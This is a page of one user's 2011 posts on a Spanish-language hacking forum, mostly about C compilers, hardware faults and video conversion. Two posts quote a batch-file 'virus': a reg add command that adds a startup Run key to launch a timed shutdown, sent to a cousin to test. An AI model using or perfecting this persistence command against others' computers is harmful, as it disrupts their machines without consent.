elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 ... 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 [48] 49 50 51 52 53 54 55 56 57 58 59 60
471  Programación / Programación C/C++ / ¿Con codeblocks también puedo compilar programas escritos en C? en: 16 Abril 2011, 22:55 pm
Estoy aprendiendo a programar con el libro "Cómo programar en C/C++" de H. M. Deitel, P.J. Deitel.

Hace un tiempo empecé aprendiendo con Dev-C++, pero leí un mensaje de Akai, dice que el está obsoleto y que el proyecto fue abandonado  :o, no sabía nada, incluso llegue hacer algunos programitas sencillos en él, pero bueno... el caso es que cuando entre a la página de codeblocks solo menciona a C++ y no sé si valdrá también para C.

472  Informática / Hardware / Mi computadora se le va la imagen en: 16 Abril 2011, 22:07 pm
Casi siempre cuando la prendo al primer intento no funciona, o sea, enciende y todo normal, pero cuando no es que se queda detectando el disco duro, es que sube a windows y después, de repente se pone la pantalla negra y el mouse se agiganta y no se mueve, como si hubiera un cambio en la resolución.

Lo raro es que después que la reseteo (la mayoría de las veces con una sola vez es suficiente) no vuelve a pasar, hasta el otro día.

Es un disco IDE Maxtor. Le cambié la correa, pero sigue pasando lo mismo.

473  Programación / Scripting / Re: "Virus" que solo funciona en mi computadora xD en: 16 Abril 2011, 21:50 pm
Quiero saber por qué no funcionó cuando lo mandé.

Tratando de hacer virus se aprende.
474  Programación / Scripting / "Virus" que solo funciona en mi computadora xD en: 15 Abril 2011, 07:11 am
Hola. Estoy creando un "modelo" del conocido virus que te apaga la computadora. Lo estoy haciendo como un batch, por eso pongo el tema en este subforo.

Lo que tengo escrito es:
Código:
reg add "hklm\software\microsoft\windows\currentversion\run" /v virus /d "%windir%\system32\shutdown.exe -i -s -t 100"

En mi computadora funciona bien, pero cuando se lo pasé a mi prima, por msn, para probar, no se agrega la clave en el registro y no sé por qué. Ella tiene el mismo sistema operativo, windows xp, sp3. De hecho, ella escribió todo en la consola y le funcionó (se creó la clave en el registro), pero si lo hace desde el archivo .bat o .com o .cmd, no funciona.
475  Informática / Hardware / Re: Windows no reconoce usb tras infección con virus en: 3 Abril 2011, 01:57 am
No, el administrador de discos no la reconoce.

No he probado en Linux, porque no lo tengo, pero veré si el lunes en la laptop de algún amigo me la revisa. Aunque creo que ya está muerta...

Pero siempre había pensado que software (virus en este caso) no puede dañar el hardware....
476  Informática / Hardware / Windows no reconoce usb tras infección con virus en: 2 Abril 2011, 00:04 am
Tengo Windows XP SP3, la memoria usb es de un amigo, el tiene Windows 7 y tampoco se reconoce en su PC.

Es una Kingston DT101 G2 de 4GB.

Según él me contó, después de que le copiaran unos archivos en la usb. Él la abrió en su computadora y todos los archivos aparecían como accesos directos (por los virus), como ningún archivo se podía abrir, la formateó y apartir de ahí windows no la reconoce.

Se sabe que la computadora estaba infectada porque era la de un profesor y cuando pasaron los archivos a las laptops los antivirus comenzaron a alertar.

Cuando la conecto me sale:



No aparece en Mi PC

¿Hay algo que se pueda hacer?
477  Media / Multimedia / Re: Necesito convertir videos con estas características en: 29 Marzo 2011, 05:56 am
La duración no depende del programa, sino del codec que uses, y como lo hayas configurado.

Este me gusta mucho:

SUPER
http://www.erightsoft.com/SUPER.html

(No hace falta decir que puede convertir videos en formato WMV3 y 2 :P)


Saludosss

PD: No se si esto lo habrás echo, pero te lo digo igual, si quieres reducir el tiempo de conversion (Yo diría que hasta un 50-65%), ajusta los pixels del video que vayas a convertir, a los que tiene la pantallita de tu mp3...

Gracias, si funcionó con ese. Solo que en vez de WMV3 es WMV9, líos de nombre, pero al parecer es el mismo formato.
478  Media / Multimedia / Necesito convertir videos con estas características en: 28 Marzo 2011, 05:24 am
Tengo un reproductor mp3 Zen creative. Reproduce video, pero solo en formato wmv y, al parecer, solo con ciertas propiedades.

El CD que trajo tiene un programa para convertir archivos a wmv (el formato compatible con el reproductor) y funciona bien a excepción de que tarda demasiado, sí, sé que las conversiones son lentas y más si no tienes una PC potente como es mi caso, pero vamos, que son videos de duración máxima de 5 minutos y peso máximo de 40 mb, y ni se diga si son archivos de 30' o <100 mb.

Además he notado que con cualquier otro conversor de video, que no sea el del mp3, la conversión es más rápida.

Pero el problema, es que cuando convierto a wmv con otro conversor que no sea el del mp3, el video no se reproduce en el mp3, dice: "formato incompatible o supera las capacidades del reproductor" aunque traté de configurarlo igual que el conversor original del mp3, pero ese mensaje es lo que sale.

Entonces lo que hice fue que cogí una que ya había convertido y que funciona bien en el mp3 y lo abrí con el Gspot para saber exactamente cuales son los ajustes que le pone el conversor del mp3 y aquí está la captura de pantalla:



Como ven el codec que usa dice WMV3 y en los conversor que he usado hasta ahora ninguna tiene esa opción, he usado el Total video converter y el Ultra converter. Y creo que ese es el problema, porque después por todo lo demás está igual.

Entonces necesito un programa que tenga esa opción
479  Informática / Hardware / Re: ¿Que tal está esta laptop? en: 7 Marzo 2011, 20:36 pm
Entre la Acer que ya puse y esta Dell: http://oascomputer.com/tienda/product_info.php?products_id=924

¿Cuál es preferible?

No conozco los procesadores AMD
480  Informática / Hardware / Re: ¿Que tal está esta laptop? en: 7 Marzo 2011, 20:22 pm
Sé que con 500 dolares (mi presupuesto) puedo conseguir algo mejor. Pero tendría que comprar en el extranjero y mi madrina (que es quién la va a pagar) me puso peros con eso.

La Acer que puse ya la tiene un amigo de mi papa.
Páginas: 1 ... 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 [48] 49 50 51 52 53 54 55 56 57 58 59 60
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines